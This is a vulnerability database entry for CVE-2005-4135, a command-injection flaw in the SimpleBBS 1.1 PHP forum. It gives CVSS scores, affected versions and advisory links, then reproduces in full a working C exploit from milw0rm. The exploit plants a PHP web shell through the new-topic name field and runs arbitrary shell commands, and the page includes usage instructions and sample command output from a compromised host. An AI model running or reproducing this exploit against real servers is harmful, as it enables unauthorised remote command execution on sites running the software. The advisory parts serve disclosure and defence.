CVE-2005-4135
CVSS 7.5
Published: 2005-12-09 10:03:00
Last revised: 2011-03-07 21:27:42

[Original] Direct static code injection vulnerability in includes/newtopic.php in SimpleBBS 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the Host header (possibly the name parameter or variable), which is then written to data/topics.php.


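[CNNVD] SimpleBBS remote command execution vulnerability (CNNVD-200512-180)

        SimpleBBS is an open-source PHP forum application.
        Because user input is not properly validated, a remote attacker can execute arbitrary PHP commands on the SimpleBBS server.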
        

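- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]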

- CPE (affected platforms and products)

cpe:/a:simplemedia:simplebbs:1.1
cpe:/a:simplemedia:simplebbs:1.0.6
cpe:/a:simplemedia:simplebbs:1.0.7

- OVAL (technical details used for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4135
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4135
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-180
(Official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2005/2807
(UNKNOWN)  VUPEN  ADV-2005-2807
http://www.securityfocus.com/bid/15764
(UNKNOWN)  BID  15764
http://www.securityfocus.com/archive/1/archive/1/418838/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051207 SimpleBBS <= v1.1 remote commands execution in c by: unitedasia security crew
http://secunia.com/advisories/17949
(VENDOR_ADVISORY)  SECUNIA  17949
http://securitytracker.com/id?1015323
(UNKNOWN)  SECTRACK  1015323

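- Vulnerability information

SimpleBBS remote command execution vulnerability
High risk  Input validation
2005-12-09 00:00:00 2005-12-09 00:00:00
Remote
        SimpleBBS is an open-source PHP forum application.
        Because user input is not properly validated, a remote attacker can execute arbitrary PHP commands on the SimpleBBS server.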
        

- Advisories and patches

        

- Vulnerability information (1361)

SimpleBBS <= 1.1 Remote Commands Execution Exploit (c code) (EDBID:1361)
php webapps
2005-12-07 Verified
0 unitedasia
N/A
/*

SimpleBBS <= v1.1 remote commands execution in c

coded by: unitedasia v.Dec.7.2005

greetz: iloveyouma

http://geography.about.com/library/maps/blrasia.htm
http://www.lib.utexas.edu/maps/middle_east_and_asia/asia_pol00.jpg

$ gcc -o bbs bbs.c

Usage ./bbs [host] [/folder/] [cmd]

$ ./bbs www.somesite.com /simplebbs/ 'ls%20-al;w;id;pwd'

HTTP/1.1 200 OK
Date: Wed, 07 Dec 2005 15:31:07 GMT
Server: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.0 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.6b
X-Powered-By: PHP/4.4.0
Connection: close
Content-Type: text/html

161||||||1|||Winning||||||0|||Willy\\\"><!--total 188
drwxrwxrwx    2 f1       f1           4096 Dec  6 17:02 .
drwxr-xr-x    7 f1       f1           4096 Nov 17  2002 ..
-rw-r--r--    1 f1       f1            916 Oct 20 09:30 WS_FTP.LOG
-rwxrwxrwx    1 f1       f1             28 Nov 17  2002 categories.php
-rwxrwxrwx    1 f1       f1            151 Dec  7 09:11 forums.php
-rwxrwxrwx    1 f1       f1              0 Nov 17  2002 index.php
-rwxrwxrwx    1 f1       f1              0 Nov 17  2002 online.php
-rwxrwxrwx    1 f1       f1            550 Nov 17  2002 options.php
-rwxrwxrwx    1 f1       f1          28098 Dec  7 10:31 posts.php
-rwxrwxrwx    1 f1       f1            151 Dec  7 09:11 temp.php
-rw-r--r--    1 nobody   nobody      87569 Dec  6 17:03 tmp.php
-rwxrwxrwx    1 f1       f1          38089 Dec  7 10:31 topics.php
 10:31am  up 195 days, 11:35,  1 user,  load average: 0.27, 0.23, 0.16
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     pts/1    watcher.somesite.com 11Nov05 11:52m 16:51   0.41s  -bash
uid=99(nobody) gid=99(nobody) groups=99(nobody)
/home/f1/public_html/simplebbs/data


*/


#include <stdio.h>
#include <string.h> /* inserted /str0ke */
#include <stdlib.h> /* inserted /str0ke */
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define closesocket(s) close(s)

#define HTTP_PORT 80

#define DATA "name=Willy\\\"><!--<?php error_reporting(0);print `\\$_GET[cmd]`; die;?>&subject=Winning&message=i would like to know how each team finds the perfect aerodinamic confuguration for each circuit, i mean, how they come to the conclusion of how the wings configurated.&sendTopic=Send"


/****************** MAIN *********************/

void sendpacket(char buffer[8192], int p, char host[100]);


int main( int argc, char **argv)
{

    char buffer[8192];
    char dat[8192];
    int count;

    if(argc<4)
    {
         printf("Usage %s [host] [/folder/] [cmd]\n\nSimpleBBS <= v1.1 remote commands execution in c\ncoded by: unitedasia v.Dec.7.2005\ngreetz: iloveyouma\n",argv[0]);
         exit(1);
    }

    sprintf(dat, DATA);

    sprintf( buffer, "POST %sindex.php?v=newtopic&c=0 HTTP/1.0\nHost: %s\nContent-Type: application/x-www-form-urlencoded\nContent-Length: %d\n\n%s\n\n\n", argv[2], argv[1], strlen(dat), dat);

    sendpacket(buffer,0,argv[1]);

    sprintf( buffer, "GET %sdata/topics.php?cmd=%s HTTP/1.0\nHost: %s\n\n", argv[2], argv[3], argv[1]);

    sendpacket(buffer,1,argv[1]);

    return count;
}

void sendpacket(char buffer[8192], int p, char host[100])
{

    struct sockaddr_in server;
    struct hostent *host_info;
    unsigned long addr;
    int sock;
    char dat[8192];
    int count;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror( "failed to create socket");
        exit(1);
    }

    /* Create socketadress of Server
     * it is type, IP-adress and portnumber */
    memset( &server, 0, sizeof (server));

    /* convert the Servername to a IP-Adress */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, "unknown server: %s\n", host);
        exit(1);
    }
    memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length);

    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);


    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
        perror( "can't connect to server");
        exit(1);
    }

    send( sock, buffer, strlen( buffer), 0);

    /* get the answer from server and put it out to stdout */
    if (p==1) {
      do {
          count = recv( sock, buffer, sizeof(buffer), 0);
          write( 1, buffer, count);
      }
      while (count > 0);
    }

    /* close the connection to the server */
    closesocket( sock);

}

// milw0rm.com [2005-12-07]
		

- Vulnerability information

21524
SimpleBBS topics.php name Field Arbitrary Command Execution
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-12-07 Unknown
2005-12-07 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
